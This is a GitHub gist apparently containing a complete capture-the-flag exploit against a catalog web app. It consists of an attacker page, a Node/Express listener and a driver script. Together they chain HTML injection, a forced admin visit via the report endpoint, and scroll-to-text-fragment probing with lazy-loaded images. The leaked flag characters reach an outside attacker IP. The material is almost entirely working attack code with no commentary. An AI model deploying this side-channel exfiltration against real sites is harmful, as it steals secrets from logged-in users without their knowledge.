Skip to content

Instantly share code, notes, and snippets.

@lbherrera

lbherrera/index.html Secret

Last active Apr 20, 2020
Embed
What would you like to do?
<html>
<head>
<title>Psst! Get out of here...</title>
<script>
const next = async () => {
let res = await fetch("/status");
let status = await res.text();
if (status === "true") {
await fetch("http://catalog.pwni.ng/user.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": `username="/><img src="http://35.185.40.22/injection"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><div align="left"><img src="http://35.185.40.22/exfiltrated" loading="lazy"></div><em>&password=1&action=login`,
"method": "POST",
"mode": "no-cors",
"credentials": "include"
});
await fetch("/unlock");
} else {
next();
}
}
next();
</script>
</head>
<body>
<iframe src="http://catalog.pwni.ng/issue.php?id=15550" style="position: absolute; width: 400%; height: 500px; border: 0"></iframe>
</body>
</html>
const express = require("express");
const app = express();
let status = false;
let unlock = false;
let match = false;
app.get("/status", (req, res) => {
res.send(`${status}`);
});
app.get("/unlock", (req, res) => {
unlock = true;
res.send("unlock");
});
app.get("/firstload", (req, res) => {
console.log("==> Admin opened challenge's page");
res.send("firstload");
});
app.get("/", (req, res) => {
console.log("==> Admin was redirected to attacker's page");
res.sendFile("index.html", {root: __dirname});
});
app.get("/injection", (req, res) => {
console.log("==> HTML injection was inserted into id=3 catalog");
setTimeout(() => {
if (match)
console.log("==> There was a match");
else
console.log("==> There wasn't a match");
match = false;
unlock = false;
status = false;
}, 1000);
res.send("injection");
});
app.get("/exfiltrated", (req, res) => {
match = true;
res.send("exfiltrated");
});
app.get("/fragment", (req, res) => {
status = true;
console.log("==> Admin was fragmented");
let timer = setInterval(async () => {
if (unlock) {
res.send("fragment");
clearInterval(timer);
}
}, 1);
});
app.listen(port);
console.log("Server running on port: " + port);
let alphabet = `}0123456789ABDEFGHIJKLMNOPQRSTUVWXYZ_`;
let payload = "";
for (let letter of alphabet) {
payload += `text=T-,F,{,-${letter}%26`;
}
payload = "#:~:" + payload.substring(0, payload.length - 3);
let image = `z"/><img src="http://35.185.40.22/fragment"><meta http-equiv="refresh" content="0;URL='http://catalog.pwni.ng/issue.php?id=3${payload}'">`;
await fetch("http://catalog.pwni.ng/post.php", {
"credentials":"include",
"headers": {
"content-type":"application/x-www-form-urlencoded"
},
"body": `id=15550&title=redirect&image=${image}&content=redirect`,
"method":"POST",
"mode":"cors"
});
let token = await grecaptcha.execute("6LcdheoUAAAAAOxUsM86wQa5c_wiDak2NnMIzO7Y", { action: "report" });
await fetch("http://catalog.pwni.ng/report.php", {
"credentials":"include",
"headers": {
"content-type":"application/x-www-form-urlencoded"
},
"referrer":"http://catalog.pwni.ng/issue.php?id=15563",
"body": `id=15544&token=${token}`,
"method":"POST",
"mode":"cors"
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.